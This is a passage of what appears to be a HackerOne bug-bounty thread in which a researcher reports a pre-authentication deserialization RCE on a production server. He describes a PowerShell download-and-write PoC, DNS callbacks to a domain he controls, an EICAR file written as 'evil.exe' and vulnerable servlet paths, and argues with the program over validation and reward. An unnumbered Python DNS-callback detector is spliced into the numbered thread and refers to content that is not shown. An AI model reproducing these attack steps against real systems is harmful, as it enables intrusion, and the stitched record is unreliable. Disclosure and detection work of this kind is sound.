  1043. After your team is able to confirm execution, they can proceed to escalate beyond protective measures. While under the terms of the bounty agreement, many techniques typically used MAY fall into "out of bounds" range; hence the CONSTANT updates and requests for approval. At any time your team has the ability to ask for more or less testing. As I've mentioned and your team has yet to acknowledge or authorize, this node has both upload and download service endpoints exposed waiting to be tested; this would be a great starting place for your red team or any other adversaries to begin to escalate toward full persistence. As my hands are tied until your team communicates authorization and I'd like to avoid entrapment, your red team can review the following article from the friendly folks at NetSPI (https://blog.netspi.com). *** Personal Note: Affiliation = none. This group has been around since 2001 (well before HP's imperialism) and has contributed a lot over the years. They also make some tools, maybe check them out for the next product bake-off? *** With a two-year-old vintage, some bits may be dated, but your red team ought to be able to use similar techniques in more modern ways.
  1044.  
  1045. 15 Ways to Bypass the PowerShell Execution Policy:
  1046. https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy
  1047.  
  1048. If your team doesn't care about this production server any longer (considering this is a two-year-old bug and many more eyes than mine have seen this, you ought not) and would like to communicate authorization for more intrusive (potentially destructive) testing, just say the word! Once your team confirms authorization for further testing against this production system or provides an alternative test system, we can take the gloves off.
  1049.  
  1050. A video? Really? Based on displayed comprehension to date, I think videos would just prove to create more confusion for your team. Here your team can find some well produced videos for review:
  1051. http://www.securitytube.net
  1052.  
  1053. Honestly, if I thought a video would help you somehow, I might consider throwing more good time at this bad problem but ...
  1054. https://www.youtube.com/watch?v=a3WcuvL737A
  1055.  
  1056. Producing accurate, artifact-free, high-quality videos is time consuming (I've wasted several hours on this response alone). I've done my best to be patient and as helpful as I can be, yet your team has ignored me at every step of the way and I'm not in the habit of rewarding bad behavior. Rewarding bad behavior is exactly what has ultimately led to this compromise. If your team MUST have a video for the holiday party, I'll do my best to create something educational, but only when we get on the same page and I am certain your team understands the mechanics of the attack vector.
  1057.  
  1058. Lastly, your request for evidence seems out of scope from my perspective since I've not made any claim to be able to generate outbound traffic using the HTTP protocol. I could try to generate outbound HTTP traffic if you like, but I think bounty programs aren't as much of a penetration test exercise as they are an application/service review. Are you requesting I perform a penetration test against your firewalls? If so, please confirm. *** Disclaimer: No affiliation or contact *** If your organization is seeking "Hacker-Powered Application Security AND Penetration Testing" bounty service, you might want to contact the self-acclaimed "Crowd Security Intelligence" group Synack (https://www.synack.com). My impression of the intent of most bounty programs is that they exist to identify and fix vulnerabilities as well as their associated exploits in products and services; not to secure an entire enterprise. Currently, any unknown pre-authenticated user has access to execute code on your system and generate a "callback". Exploitation will occur under the context of the service performing the callback, which in your case is likely Admin or SYSTEM level. Nice, right? I guess you're cool with that; I would not be if I were admin.
  1059.  
  1060. P.S. - Additional finding:
  1061. Unnecessary services installed and running.
  1062. Sure, I see it's filtered and have yet to identify exploitability, but c'mon, 2005 is calling ... is NetBIOS still a thing for this host? I've yet to see a single sign of hardening performed for this host; it feels more like a honeypot than a production server.
  1063.  
  1064. $ sudo nmap -O --osscan-guess vulnerable.host.gm.com
  1065. 139/tcp filtered netbios-ssn
  1066.  
  1067. How to: Disable NetBIOS over TCP/IP
  1068. Updated: 5 December 2005
  1069. Servers in the perimeter network should have all unnecessary protocols disabled including NetBIOS. Web servers and Domain Name System (DNS) servers do not require NetBIOS. This protocol should be disabled to reduce the threat of user enumeration.
  1070.  
  1071. The WINS tab of the Advanced TCP/IP Settings dialog box contains a Disable NetBIOS over TCP/IP option. Selecting this option only disables the NetBIOS Session Service (which listens on TCP port 139). It does not disable NetBIOS completely.
  1072.  
  1073. (https://technet.microsoft.com/en-us/library/ms143696(v=sql.90).aspx)
  1074.  
  1075. [Please excuse typos, I'm sick of proofing this]
  1076.  
  1077. ---
  1078.  
  1079. 2017-03-16 11:29:22 +0000: @cayce (comment)
  1080. I'm receiving the following for all of the endpoints I just checked:
  1081.  
  1082. 502 - Web server received an invalid response while acting as a gateway or proxy server.
  1083. There is a problem with the page you are looking for, and it cannot be displayed. When the Web server (while acting as a gateway or proxy) contacted the upstream content server, it received an invalid response from the content server.
  1084.  
  1085. It's finally offline! Looks like your team was able to validate the RCE after all. Good job!
  1086.  
  1087. Let me know if you need any further testing performed.
  1088.  
  1089. ---
  1090.  
  1091. 2017-03-17 15:39:48 +0000: @cubo (comment)
  1092. We’ve implemented fixes and will keep you updated on final remediation status.
  1093.  
  1094. ---
  1095.  
  1096. 2017-03-21 09:41:08 +0000: @cayce (comment)
  1097. powershell PoC functional break-down:
  1098.  
  1099. (aa1_cmd) (aa1_cmdx) (aa3_fwrite)
  1100. powershell > wget (or something like it depending upon PS version) > File write
  1101.  
  1102. This PoC performs several Easily Identifiable Actions Resulting in Artifacts:
  1103. (or EIARA for short)
  1104. 1: Invocation of remote command(s)/script(s)
  1105. Evidence: host process/user event logs
  1106. 2: IP based web request
  1107. a) HTTP (get it)
  1108. Evidence: wire traffic, server/client process logs
  1109. b) DNS (where to get it)
  1110. Evidence: wire traffic, server/client process logs
  1111. 3: Local file write (%TEMP% or E:/HPBSM/WebServer)
  1112. Evidence: file presence, host process/user event logs
  1113.  
  1114. - Point one is a blindly inferred tautology due to the OR condition for points two and
  1115. three.
  1116. - Point two has been documented to be true by return of DNS artifacts.
  1117. - Point three is inferred to be true upon documented (request/response copy/pasted below)
  1118. return of a 500 server error message (as opposed to a 40*) when request for
  1119. https://vulnerable.host.gm.com/tehgoat.jpg is made.
  1120.  
  1121. (Due to HTTP restrictions, it is believed that this ought have been an empty file. If
  1122. it wasn't empty and someone opened it, sorry 'bout that!)
  1123.  
  1124. As this is/was a production server, I felt it imprudent to perform excessive write/comms attempts (potentially, unintentionally creating further exposure) while working on the particulars of escalation and persistence without explicit consent.
  1125.  
  1126. Arbitrary write access coupled with encrypted exfil channel = game over. Tastes like chicken; how do you like your chicken? Fried, boiled, BBQed, baked, roasted ... etc.
  1127.  
  1128. That said, in an attempt to passively validate and escalate this exposure remotely, the following steps were taken with the goal of triggering additional reference points within alternative defensive mechanisms:
  1129.  
  1130. Attempt to trigger "End-Point"/AV protection:
  1131. "End-Point" defense hype products or even old school AV/FIM ought always be deployed
  1132. properly on production systems (even if only for low-hanging fruit)
  1133.  
  1134. Requests were made for EICAR test file (https://secure.eicar.org/eicar.com.txt) with
  1135. output writing to "evil.exe".
  1136.  
  1137. I may not have dialed in the write directory at first and don't see that I had a
  1138. chance to make record of validation as proven with 500 for tehgoat.jpg. Also, initial
  1139. tests missed the mark on this due to HTTP restrictions. Instead, a more direct route
  1140. is to simply echo the string to output. I revised my payloads but, never came back
  1141. around to it since I saw evidence of write access further along and remediation had begun
  1142. by this point.
  1143.  
  1144. Attempt to trigger egress protection:
  1145. When malware from the 90s calls home, it does so explicitly. Any well defended/monitored
  1146. network will have something functionally equivalent to "split DNS"; any and all
  1147. direct DNS record checking from network clients ought be investigated as either an
  1148. incident or a misconfiguration.
  1149.  
  1150. I was able to generate DNS requests to a domain of my choosing which is doing my bidding.
  1151. DNS requests are typically made to the system assigned DNS server yet, this default
  1152. system behavior can easily be manipulated by a client program to allow for a direct
  1153. query. I changed my payload to support direct DNS requests such as this and in doing
  1154. so, I believe the domain used during this testing was identified by some defense
  1155. mechanism as, hours after use within PoCs this domain started to appear on some very
  1156. unique behavioral blacklists. This could be the result of traditionally weak blacklist
  1157. qualifications (likely) but, I find it an interesting coincidence to say the least.
  1158. Despite not being thrilled about drawing mal-attention toward an innocent domain
  1159. provider, I would be thrilled with a finding of proactive defensive measures being
  1160. effective!
  1161.  
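Detection logic for the "split DNS" point just made and for the DNS artifact in the EIARA list above, as an added example that is not part of the report: internal hosts should only ever send port-53 traffic to the sanctioned resolvers, so a flow from a server straight to an outside address (the shape of the Collaborator lookup quoted earlier) is either a misconfiguration or a callback worth an incident ticket. The flow-log format, addresses and resolver list are constructed.

```python
"""Flag DNS flows that bypass the sanctioned resolvers. Added example, not
from the report; the flow-log format, addresses and policy are constructed."""
import ipaddress
import re

# Constructed network policy: where internal hosts are allowed to send DNS
SANCTIONED_RESOLVERS = {ipaddress.ip_address("10.0.0.53"),
                        ipaddress.ip_address("10.0.1.53")}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# One flow per line; qname/qtype are present only when the sensor decoded DNS
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>udp|tcp) "
    r"dport=(?P<dport>\d+)(?: qname=(?P<qname>\S+) qtype=(?P<qtype>\S+))?$"
)


def parse_flow(line):
    """Parse one flow-log line into a dict, or return None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    try:
        rec["src"] = ipaddress.ip_address(rec["src"])
        rec["dst"] = ipaddress.ip_address(rec["dst"])
    except ValueError:
        return None
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def classify_flow(rec):
    """Label a DNS flow: None when it follows policy, else why it does not."""
    if rec["dport"] != 53 or not is_internal(rec["src"]):
        return None
    if rec["src"] in SANCTIONED_RESOLVERS:
        return None  # the resolvers themselves are expected to recurse/forward
    if rec["dst"] in SANCTIONED_RESOLVERS:
        return None
    if is_internal(rec["dst"]):
        return "internal-unsanctioned-resolver"  # rogue or self-hosted DNS
    return "direct-external-dns"  # the callback pattern seen in the thread


def scan_flows(lines):
    """Return (ts, src, dst, qname, label) for every flow that breaks policy."""
    alerts = []
    for line in lines:
        rec = parse_flow(line)
        if rec is None:
            continue
        label = classify_flow(rec)
        if label:
            alerts.append((rec["ts"], str(rec["src"]), str(rec["dst"]),
                           rec["qname"], label))
    return alerts


# Constructed sample flows; the second mirrors the Collaborator lookup above
SAMPLE_FLOWS = [
    "2017-03-14T19:55:01Z src=10.20.30.40 dst=10.0.0.53 proto=udp dport=53 qname=updates.corp.example qtype=A",
    "2017-03-14T19:57:25Z src=10.20.30.40 dst=203.0.113.7 proto=udp dport=53 qname=randomaddress.burpcollaborator.net qtype=A",
    "2017-03-14T19:57:26Z src=10.0.0.53 dst=198.51.100.10 proto=udp dport=53 qname=www.example.com qtype=A",
    "2017-03-14T19:58:00Z src=10.20.30.41 dst=10.20.30.99 proto=tcp dport=53 qname=corp.example qtype=AXFR",
    "2017-03-14T19:58:30Z src=10.20.30.40 dst=198.51.100.20 proto=tcp dport=443",
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
```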
  1162. ---
  1163.  
  1164. 2017-03-21 09:49:33 +0000: @cayce (comment)
  1165. Request:
  1166.  
  1167. GET /tehgoat.jpg HTTP/1.1
  1168. Host: vulnerable.host.gm.com
  1169. Connection: close
  1170. Upgrade-Insecure-Requests: 1
  1171. User-Agent: tehduckneedsmorefloyd v0.9
  1172. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  1173. Accept-Encoding: gzip, deflate, sdch, br
  1174. Accept-Language: en-US,en;q=0.8
  1175. Cookie: JSESSIONID=sfPuoutTTASpacesaucePFFQx
  1176.  
  1177. Response:
  1178. HTTP/1.1 500 Internal Server Error
  1179. Content-Type: text/html;charset=UTF-8
  1180. Server: Microsoft-IIS/8.5
  1181. X-Powered-By: JSP/2.2
  1182. X-Powered-By: ARR/2.5
  1183. Date: Sat, 11 Mar 2017 10:16:08 GMT
  1184. Connection: close
  1185. Content-Length: 6247
  1186.  
  1187. ---
  1188.  
  1189. 2017-03-21 09:57:43 +0000: @cayce (comment)
  1190. While it's likely irrelevant at this point, FWIW my notes indicate that the following end-points likely suffer from the aforementioned deserialization attack vector:
  1191.  
  1192. /filters/CategoriesServlet
  1193. /filters/FiltersServlet
  1194.  
  1195. Feel free to confirm a minimum of six pre-auth RCEs, if you like.
  1196.  
  1197. ---
  1198.  
  1199. 2017-03-27 18:48:21 +0000: @cayce (comment)
  1200. Good luck with your program!
  1201.  
  1202. ---
  1203.  
  1204. 2017-03-30 17:23:20 +0000: @hackerone-support (external user joined)
  1205.  
  1206.  
  1207. ---
  1208.  
  1209. 2017-04-12 22:38:48 +0000: @cayce (comment)
  1210. Your team's last response was over 26 days ago. It's safe to say that your team has validated, responded, and remediated without recognition or reward (read: stolen my work).
  1211.  
  1212. I'd like to finalize for publishing so, please make any additional comments in a swift manner.
  1213.  
  1214. ---
  1215.  
  1216. 2017-04-13 20:48:07 +0000: @cubo (bug informative)
  1217. We were unable to fully validate RCE but were able to remediate the information disclosure portion of the vulnerability and closed it as such. As noted in our profile our program does not offer bounties. Thanks again for the submission.
  1218.  
  1219. ---
  1220.  
  1221. 2017-05-29 08:18:19 +0000: @cayce (comment)
  1222. Okay jokers, I'm ready to publish my findings. What is the process to make this report publicly visible?